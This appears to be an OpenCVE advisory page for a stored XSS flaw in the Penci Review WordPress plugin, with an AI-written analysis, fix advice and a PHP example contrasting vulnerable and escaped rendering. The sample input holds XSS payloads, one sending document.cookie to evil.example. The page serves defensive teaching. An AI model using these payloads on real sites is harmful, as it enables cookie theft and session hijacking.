Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Review penci-review allows Stored XSS. This issue affects Penci Review: from n/a through <= 3.5.
Published: 2026-01-23
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑Site Scripting (Stored XSS)
Action: Update Plugin
AI Analysis

Impact

The Penci Review plugin stores user‑supplied data and later emits it into generated pages without adequate neutralization, enabling stored cross‑site scripting. An attacker who gets a payload stored can have it execute in the browser of every visitor who views the affected page, with the script running in that visitor's session on the site; depending on who views it, that can mean session hijacking, defacement or malware delivery. The weakness is CWE‑79, Improper Neutralization of Input During Web Page Generation: an output‑encoding failure rather than a pure input‑validation flaw.

Affected Systems

The vulnerability affects the WordPress plugin Penci Review (slug penci-review) by PenciDesign, from its earliest release through version 3.5 inclusive; no fixed version is recorded on this page.

Risk and Exploitability

The CVSS 3.1 score of 6.5 (Medium) indicates moderate risk, and an EPSS score below 1% suggests exploitation is unlikely at present; the vulnerability is not listed in the CISA KEV catalog. The vector (AV:N/AC:L/PR:L/UI:R/S:C) describes a network‑reachable flaw that needs an authenticated low‑privileged account to plant the payload and a victim who views the rendered content; scope is changed because the script executes in the visitor's browser rather than in the plugin's own security context. The CVE description does not say which plugin field or setting carries the payload. Detection is harder than for reflected XSS because the injection request looks like an ordinary content submission and the script only fires when the stored content is later rendered, so hunting should inspect stored plugin data rather than request logs alone.

Generated by OpenCVE AI on April 28, 2026 at 17:49 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Penci Review to a release later than 3.5 that the vendor identifies as fixing this XSS flaw; this page currently records no fixed version.
  • If no update is available, remove the plugin or replace it with a trusted alternative that does not contain this weakness.
  • If the plugin must stay in place, add sanitization on save and, more importantly, context‑appropriate escaping at output (esc_html for text nodes, esc_attr for attribute values, wp_kses_post for fields that legitimately carry limited HTML) so that stored data cannot be rendered as markup.
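
The following added example (not Penci Review's own code, which this page does not show) illustrates the third action with a hypothetical review‑box shortcode: the vulnerable pattern that concatenates stored fields straight into HTML, beside a hardened version that sanitizes on save and escapes per output context on render. The field names, function names and sample input are assumptions. Simplified stand‑ins for the WordPress escaping functions are included so the file runs under a plain php interpreter; inside WordPress those branches are skipped and the real functions, which do more (encoding checks, an HTML allow‑list), are used.

```php
<?php
// Added example, not plugin code. Assumption: review fields (title, score,
// summary) are submitted by a low-privileged user, stored, and rendered later.

// Stand-ins so this runs with `php review_example.php` outside WordPress.
// They are simplified approximations of the real WordPress functions.
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text) { return esc_html($text); }
}
if (!function_exists('wp_kses_post')) {
    // The real function keeps an allow-list of post HTML; escaping everything
    // is the safe fallback for a stand-in.
    function wp_kses_post($text) { return esc_html($text); }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($text) { return trim(strip_tags((string) $text)); }
}

// Constructed input: what an author-level account might submit. The score
// field breaks out of an attribute, the summary carries a script tag.
$submitted = [
    'title'   => 'Great camera',
    'score'   => '9" onmouseover="alert(document.cookie)',
    'summary' => 'Solid value<script>document.location="//evil.example/?c="+document.cookie</script>',
];

// --- Vulnerable pattern: stored verbatim, echoed verbatim into HTML ---
function vulnerable_save(array $in): array { return $in; }
function vulnerable_render(array $stored): string {
    return '<div class="review" data-score="' . $stored['score'] . '">'
         . '<h3>' . $stored['title'] . '</h3>'
         . '<p>' . $stored['summary'] . '</p></div>';
}

// --- Hardened: sanitize on save AND escape per output context on render ---
function hardened_save(array $in): array {
    return [
        'title'   => sanitize_text_field($in['title']),
        'score'   => max(0, min(10, (int) $in['score'])),  // numeric field: coerce, do not trust
        'summary' => wp_kses_post($in['summary']),         // limited HTML is legitimate here
    ];
}
function hardened_render(array $stored): string {
    // Escape at output even though save sanitized: rows stored before the fix,
    // or written by another code path, still flow through here.
    return '<div class="review" data-score="' . esc_attr((string) $stored['score']) . '">'
         . '<h3>' . esc_html($stored['title']) . '</h3>'
         . '<p>' . wp_kses_post($stored['summary']) . '</p></div>';
}

echo "vulnerable:\n", vulnerable_render(vulnerable_save($submitted)), "\n\n";
echo "hardened:\n", hardened_render(hardened_save($submitted)), "\n";
```

The vulnerable output contains a live onmouseover handler and a script element; the hardened output renders the same submission as inert text and a score of 9. The point of escaping in hardened_render, not only in hardened_save, is that stored XSS payloads already in the database survive a save‑side fix, so the render path has to be safe on its own.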

Advisories

No advisories yet.

History

Thu, 23 Apr 2026 15:00:00 +0000

Type: Metrics
Values Removed:
  cvssV3_1 {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}
Values Added:
  cvssV3_1 {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Mon, 26 Jan 2026 12:00:00 +0000

Type: First Time appeared
Values Added: Wordpress; Wordpress wordpress

Type: Vendors & Products
Values Added: Wordpress; Wordpress wordpress

Fri, 23 Jan 2026 21:15:00 +0000

Type: Metrics
Values Added:
  cvssV3_1 {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}
  ssvc {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 23 Jan 2026 14:45:00 +0000

Type: Description
Values Added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Review penci-review allows Stored XSS.This issue affects Penci Review: from n/a through <= 3.5.

Type: Title
Values Added: WordPress Penci Review plugin <= 3.5 - Cross Site Scripting (XSS) vulnerability

Type: Weaknesses
Values Added: CWE-79

Type: References
Values Added:

MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:14:50.188Z

Reserved: 2026-01-23T12:32:17.046Z

Link: CVE-2026-24600

Vulnrichment

Updated: 2026-01-23T20:37:57.532Z

NVD

Status: Deferred

Published: 2026-01-23T15:16:18.273

Modified: 2026-04-28T15:16:18.303

Link: CVE-2026-24600

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-28T18:00:14Z

Weaknesses